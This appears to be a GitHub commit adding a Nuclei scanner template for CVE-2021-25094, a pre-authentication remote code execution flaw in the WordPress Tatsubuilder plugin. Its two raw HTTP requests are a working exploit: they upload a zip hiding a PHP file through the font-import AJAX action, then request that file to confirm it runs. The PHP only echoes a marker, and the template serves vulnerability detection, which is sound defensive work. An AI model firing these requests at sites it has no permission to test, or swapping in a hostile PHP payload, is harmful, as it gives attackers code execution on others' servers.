Create CVE-2021-25094.yaml

patch-12
Ritik Chaddha 2024-10-01 20:40:07 +04:00 committed by GitHub
parent ad70b56385
commit ec36cf2a4f
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 69 additions and 0 deletions

View File

@ -0,0 +1,69 @@
id: CVE-2021-25094
info:
name: Wordpress Tatsubuilder <= 3.3.11 - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
An unrestricted file upload in WordPress Tatsubuilder plugin version <= 3.3.11 enables an unauthenticated attacker to perform a remote code execution (RCE) on the server host due to multiple weaknesses in the font import feature and put 100,000 websites at risk.
remediation: Fixed in 3.3.12
reference:
- https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/
- https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25094
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2021-25094
cwe-id: CWE-306
cpe: cpe:2.3:a:brandexponents:tatsu:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
verified: true
publicwww-query:
tags: cve,cve2021,wp,wp-plugin,wordpress,tatsu,rce
variables:
marker: "{{randstr}}"
b64marker: "{{base64(marker)}}"
filename: "{{rand_base(5)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=a8bfdd88f26f754c25496d0dd4962d38
--a8bfdd88f26f754c25496d0dd4962d38
Content-Disposition: form-data; name="action"
add_custom_font
--a8bfdd88f26f754c25496d0dd4962d38
Content-Disposition: form-data; name="file"; filename="{{filename}}.zip"
{{zip('.{{filename}}.php','<?php echo base64_decode(\'{{b64marker}}\'); ?>')}}
--a8bfdd88f26f754c25496d0dd4962d38--
matchers:
- type: word
part: body
words:
- '"name":"{{to_lower(filename)}}"'
- '"status":"success'
condition: and
internal: true
- raw:
- |
GET /wp-content/uploads/typehub/custom/{{to_lower(filename)}}/.{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '{{marker}}'